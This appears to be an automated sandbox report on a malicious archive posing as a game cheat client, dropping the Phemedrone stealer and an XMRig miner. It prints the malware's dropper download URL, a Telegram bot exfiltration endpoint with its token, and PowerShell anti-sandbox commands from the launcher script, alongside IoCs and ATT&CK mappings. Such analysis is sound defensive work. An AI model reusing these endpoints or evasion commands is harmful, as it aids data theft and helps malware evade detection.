phemedrone | 99b3fa12a8ef18b29156fb8e604cd7a2b11db9f82486ba024ab8c18e1bff997e

Resubmissions

26-07-2024 11:54

240726-n2vbeszckd 4

26-07-2024 11:41

240726-ntvl8avgrp 10

Analysis

max time kernel
92s
max time network
92s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
26-07-2024 11:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Nursultan_Nextgen.zip
Size

97.9MB
MD5

9eff264f3d9a7ca42764c9f94d7dd055
SHA1

6b1f4d465908eedf63592f699c6bea8a0075f72b
SHA256

99b3fa12a8ef18b29156fb8e604cd7a2b11db9f82486ba024ab8c18e1bff997e
SHA512

a8a3d256ca210eede32a86bf53fa07e7a14009962826c9b09b511a38f9023a4bec20a810a472eb76c6eab291383913d212826b4dc3e579f82de4e78f54eef5de
SSDEEP

3145728:2/pM+wahZ4nNjMtFpB5TW3oAphPJ+R2PIhxru:2/zlZGYHpB1W3oAphPA2Puu

Score

10^/10

phemedrone xmrig defense_evasion discovery evasion execution miner persistence stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://drive.usercontent.google.com/u/0/uc?id=1uH0vQ_juAop0fqiOEIdPBdq1AMQmvndT&export=download

Extracted

Family

phemedrone

https://api.telegram.org/bot7230260246:AAFy1nkEQHkcEude1v3boXRM_xhzB5HwGJ0/sendDocument

Signatures

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral1/memory/2092-2523-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2092-2530-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2092-2529-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2092-2528-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2092-2526-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2092-2527-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2092-2524-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2092-3527-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2092-3528-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	2300	powershell.exe
14	2636	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2140	powershell.exe
1636	powershell.exe
4984	powershell.exe
4696	powershell.exe
1324	powershell.exe
3608	powershell.exe
2508	powershell.exe
3048	powershell.exe
5076	powershell.exe
1752	powershell.exe
1752	powershell.exe
484	powershell.exe
2300	powershell.exe
2636	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 4 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	java8-update.exe
File created	C:\Windows\system32\drivers\etc\hosts	zrgqfbcavrkx.exe
File created	C:\Windows\system32\drivers\etc\hosts	java8-update.exe
File created	C:\Windows\system32\drivers\etc\hosts	zrgqfbcavrkx.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 6 IoCs

pid	Process
1268	optionsof.exe
4212	java8-update.exe
2948	zrgqfbcavrkx.exe
1636	optionsof.exe
648	java8-update.exe
4224	zrgqfbcavrkx.exe

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2092-2519-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2092-2523-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2092-2530-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2092-2529-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2092-2528-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2092-2526-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2092-2527-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2092-2524-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2092-2522-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2092-2521-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2092-2518-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2092-2520-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2092-3527-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2092-3528-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Power Settings 1 TTPs 16 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1928	powercfg.exe
4172	powercfg.exe
2020	powercfg.exe
316	powercfg.exe
3064	powercfg.exe
1032	powercfg.exe
224	powercfg.exe
4688	powercfg.exe
1336	powercfg.exe
556	powercfg.exe
4804	powercfg.exe
208	powercfg.exe
3116	powercfg.exe
2244	powercfg.exe
3224	powercfg.exe
2632	powercfg.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	java8-update.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	zrgqfbcavrkx.exe
File opened for modification	C:\Windows\system32\MRT.exe	java8-update.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	zrgqfbcavrkx.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1268 set thread context of 4688	1268	optionsof.exe	122
PID 2948 set thread context of 3576	2948	zrgqfbcavrkx.exe	202
PID 2948 set thread context of 2092	2948	zrgqfbcavrkx.exe	207
PID 1636 set thread context of 1576	1636	optionsof.exe	234

Hide Artifacts: Ignore Process Interrupts 1 TTPs 12 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

defense_evasion

Ignore Process Interrupts

T1564.011

pid	Process
4296	powershell.exe
3916	powershell.exe
640	powershell.exe
4184	powershell.exe
2140	powershell.exe
2468	powershell.exe
5060	powershell.exe
4804	powershell.exe
2712	powershell.exe
3692	powershell.exe
4276	powershell.exe
4636	powershell.exe

Launches sc.exe 26 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4180	sc.exe
1804	sc.exe
2424	sc.exe
704	sc.exe
648	sc.exe
1460	sc.exe
3460	sc.exe
1380	sc.exe
3460	sc.exe
1648	sc.exe
2052	sc.exe
4468	sc.exe
5100	sc.exe
4988	sc.exe
3568	sc.exe
4280	sc.exe
1252	sc.exe
4596	sc.exe
2400	sc.exe
4292	sc.exe
4488	sc.exe
5040	sc.exe
1528	sc.exe
1268	sc.exe
2428	sc.exe
2676	sc.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2428	4688	WerFault.exe	122
4748	1576	WerFault.exe	234

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	optionsof.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	optionsof.exe

Delays execution with timeout.exe 4 IoCs

evasion

pid	Process
4100	timeout.exe
3612	timeout.exe
3740	timeout.exe
4564	timeout.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe
4276	powershell.exe
4276	powershell.exe
4276	powershell.exe
3048	powershell.exe
3048	powershell.exe
3048	powershell.exe
2140	powershell.exe
2140	powershell.exe
2140	powershell.exe
1636	powershell.exe
1636	powershell.exe
1636	powershell.exe
2300	powershell.exe
2300	powershell.exe
2300	powershell.exe
4636	powershell.exe
4636	powershell.exe
4636	powershell.exe
4984	powershell.exe
4984	powershell.exe
4984	powershell.exe
2140	powershell.exe
2140	powershell.exe
2140	powershell.exe
2468	powershell.exe
2468	powershell.exe
2468	powershell.exe
1432	powershell.exe
1432	powershell.exe
1432	powershell.exe
5060	powershell.exe
5060	powershell.exe
5060	powershell.exe
4804	powershell.exe
4804	powershell.exe
4212	java8-update.exe
4804	powershell.exe
1752	powershell.exe
1752	powershell.exe
1752	powershell.exe
1752	powershell.exe
640	powershell.exe
640	powershell.exe
4212	java8-update.exe
4212	java8-update.exe
640	powershell.exe
4212	java8-update.exe
4212	java8-update.exe
4212	java8-update.exe
4212	java8-update.exe
4212	java8-update.exe
4212	java8-update.exe
4212	java8-update.exe
4212	java8-update.exe
4212	java8-update.exe
4212	java8-update.exe
4212	java8-update.exe
4212	java8-update.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3916	powershell.exe
Token: SeIncreaseQuotaPrivilege	3916	powershell.exe
Token: SeSecurityPrivilege	3916	powershell.exe
Token: SeTakeOwnershipPrivilege	3916	powershell.exe
Token: SeLoadDriverPrivilege	3916	powershell.exe
Token: SeSystemProfilePrivilege	3916	powershell.exe
Token: SeSystemtimePrivilege	3916	powershell.exe
Token: SeProfSingleProcessPrivilege	3916	powershell.exe
Token: SeIncBasePriorityPrivilege	3916	powershell.exe
Token: SeCreatePagefilePrivilege	3916	powershell.exe
Token: SeBackupPrivilege	3916	powershell.exe
Token: SeRestorePrivilege	3916	powershell.exe
Token: SeShutdownPrivilege	3916	powershell.exe
Token: SeDebugPrivilege	3916	powershell.exe
Token: SeSystemEnvironmentPrivilege	3916	powershell.exe
Token: SeRemoteShutdownPrivilege	3916	powershell.exe
Token: SeUndockPrivilege	3916	powershell.exe
Token: SeManageVolumePrivilege	3916	powershell.exe
Token: 33	3916	powershell.exe
Token: 34	3916	powershell.exe
Token: 35	3916	powershell.exe
Token: 36	3916	powershell.exe
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeIncreaseQuotaPrivilege	3692	powershell.exe
Token: SeSecurityPrivilege	3692	powershell.exe
Token: SeTakeOwnershipPrivilege	3692	powershell.exe
Token: SeLoadDriverPrivilege	3692	powershell.exe
Token: SeSystemProfilePrivilege	3692	powershell.exe
Token: SeSystemtimePrivilege	3692	powershell.exe
Token: SeProfSingleProcessPrivilege	3692	powershell.exe
Token: SeIncBasePriorityPrivilege	3692	powershell.exe
Token: SeCreatePagefilePrivilege	3692	powershell.exe
Token: SeBackupPrivilege	3692	powershell.exe
Token: SeRestorePrivilege	3692	powershell.exe
Token: SeShutdownPrivilege	3692	powershell.exe
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeSystemEnvironmentPrivilege	3692	powershell.exe
Token: SeRemoteShutdownPrivilege	3692	powershell.exe
Token: SeUndockPrivilege	3692	powershell.exe
Token: SeManageVolumePrivilege	3692	powershell.exe
Token: 33	3692	powershell.exe
Token: 34	3692	powershell.exe
Token: 35	3692	powershell.exe
Token: 36	3692	powershell.exe
Token: SeDebugPrivilege	4276	powershell.exe
Token: SeIncreaseQuotaPrivilege	4276	powershell.exe
Token: SeSecurityPrivilege	4276	powershell.exe
Token: SeTakeOwnershipPrivilege	4276	powershell.exe
Token: SeLoadDriverPrivilege	4276	powershell.exe
Token: SeSystemProfilePrivilege	4276	powershell.exe
Token: SeSystemtimePrivilege	4276	powershell.exe
Token: SeProfSingleProcessPrivilege	4276	powershell.exe
Token: SeIncBasePriorityPrivilege	4276	powershell.exe
Token: SeCreatePagefilePrivilege	4276	powershell.exe
Token: SeBackupPrivilege	4276	powershell.exe
Token: SeRestorePrivilege	4276	powershell.exe
Token: SeShutdownPrivilege	4276	powershell.exe
Token: SeDebugPrivilege	4276	powershell.exe
Token: SeSystemEnvironmentPrivilege	4276	powershell.exe
Token: SeRemoteShutdownPrivilege	4276	powershell.exe
Token: SeUndockPrivilege	4276	powershell.exe
Token: SeManageVolumePrivilege	4276	powershell.exe
Token: 33	4276	powershell.exe
Token: 34	4276	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1380 wrote to memory of 3240	1380	cmd.exe	81
PID 1380 wrote to memory of 3240	1380	cmd.exe	81
PID 1380 wrote to memory of 4268	1380	cmd.exe	82
PID 1380 wrote to memory of 4268	1380	cmd.exe	82
PID 1380 wrote to memory of 4596	1380	cmd.exe	83
PID 1380 wrote to memory of 4596	1380	cmd.exe	83
PID 1380 wrote to memory of 1884	1380	cmd.exe	84
PID 1380 wrote to memory of 1884	1380	cmd.exe	84
PID 1380 wrote to memory of 3036	1380	cmd.exe	85
PID 1380 wrote to memory of 3036	1380	cmd.exe	85
PID 1380 wrote to memory of 3916	1380	cmd.exe	86
PID 1380 wrote to memory of 3916	1380	cmd.exe	86
PID 1380 wrote to memory of 1428	1380	cmd.exe	88
PID 1380 wrote to memory of 1428	1380	cmd.exe	88
PID 1380 wrote to memory of 3692	1380	cmd.exe	89
PID 1380 wrote to memory of 3692	1380	cmd.exe	89
PID 1380 wrote to memory of 5032	1380	cmd.exe	91
PID 1380 wrote to memory of 5032	1380	cmd.exe	91
PID 1380 wrote to memory of 4276	1380	cmd.exe	92
PID 1380 wrote to memory of 4276	1380	cmd.exe	92
PID 1380 wrote to memory of 3048	1380	cmd.exe	93
PID 1380 wrote to memory of 3048	1380	cmd.exe	93
PID 1380 wrote to memory of 2140	1380	cmd.exe	94
PID 1380 wrote to memory of 2140	1380	cmd.exe	94
PID 1380 wrote to memory of 5076	1380	cmd.exe	95
PID 1380 wrote to memory of 5076	1380	cmd.exe	95
PID 1380 wrote to memory of 2648	1380	cmd.exe	96
PID 1380 wrote to memory of 2648	1380	cmd.exe	96
PID 1380 wrote to memory of 4692	1380	cmd.exe	97
PID 1380 wrote to memory of 4692	1380	cmd.exe	97
PID 1380 wrote to memory of 2424	1380	cmd.exe	98
PID 1380 wrote to memory of 2424	1380	cmd.exe	98
PID 1380 wrote to memory of 1636	1380	cmd.exe	99
PID 1380 wrote to memory of 1636	1380	cmd.exe	99
PID 1380 wrote to memory of 4720	1380	cmd.exe	100
PID 1380 wrote to memory of 4720	1380	cmd.exe	100
PID 1380 wrote to memory of 4100	1380	cmd.exe	101
PID 1380 wrote to memory of 4100	1380	cmd.exe	101
PID 1380 wrote to memory of 4180	1380	cmd.exe	102
PID 1380 wrote to memory of 4180	1380	cmd.exe	102
PID 1380 wrote to memory of 2936	1380	cmd.exe	103
PID 1380 wrote to memory of 2936	1380	cmd.exe	103
PID 1380 wrote to memory of 3400	1380	cmd.exe	104
PID 1380 wrote to memory of 3400	1380	cmd.exe	104
PID 1380 wrote to memory of 2300	1380	cmd.exe	105
PID 1380 wrote to memory of 2300	1380	cmd.exe	105
PID 1380 wrote to memory of 2400	1380	cmd.exe	106
PID 1380 wrote to memory of 2400	1380	cmd.exe	106
PID 2400 wrote to memory of 4496	2400	cmd.exe	107
PID 2400 wrote to memory of 4496	2400	cmd.exe	107
PID 1380 wrote to memory of 3124	1380	cmd.exe	108
PID 1380 wrote to memory of 3124	1380	cmd.exe	108
PID 1380 wrote to memory of 4636	1380	cmd.exe	109
PID 1380 wrote to memory of 4636	1380	cmd.exe	109
PID 1380 wrote to memory of 796	1380	cmd.exe	110
PID 1380 wrote to memory of 796	1380	cmd.exe	110
PID 1380 wrote to memory of 3156	1380	cmd.exe	111
PID 1380 wrote to memory of 3156	1380	cmd.exe	111
PID 1380 wrote to memory of 4512	1380	cmd.exe	112
PID 1380 wrote to memory of 4512	1380	cmd.exe	112
PID 4512 wrote to memory of 508	4512	cmd.exe	113
PID 4512 wrote to memory of 508	4512	cmd.exe	113
PID 1380 wrote to memory of 4648	1380	cmd.exe	114
PID 1380 wrote to memory of 4648	1380	cmd.exe	114

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Nursultan_Nextgen.zip
1⤵
PID:4812

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:1380
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:3240
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:4268
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:4596
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:1884
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:3036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3916
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:1428
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3692
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:5032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4276
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2140
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:5076
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:2648
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:4692
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:2424
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1636
- C:\Windows\system32\wscript.exe
  wscript /b
  2⤵
  PID:4720
- C:\Windows\system32\timeout.exe
  timeout 0
  2⤵
  - Delays execution with timeout.exe
  PID:4100
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:4180
- C:\Windows\system32\doskey.exe
  doskey CD=RECOVER
  2⤵
  PID:2936
- C:\Windows\system32\doskey.exe
  doskey TYPE=ROBOCOPY
  2⤵
  PID:3400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
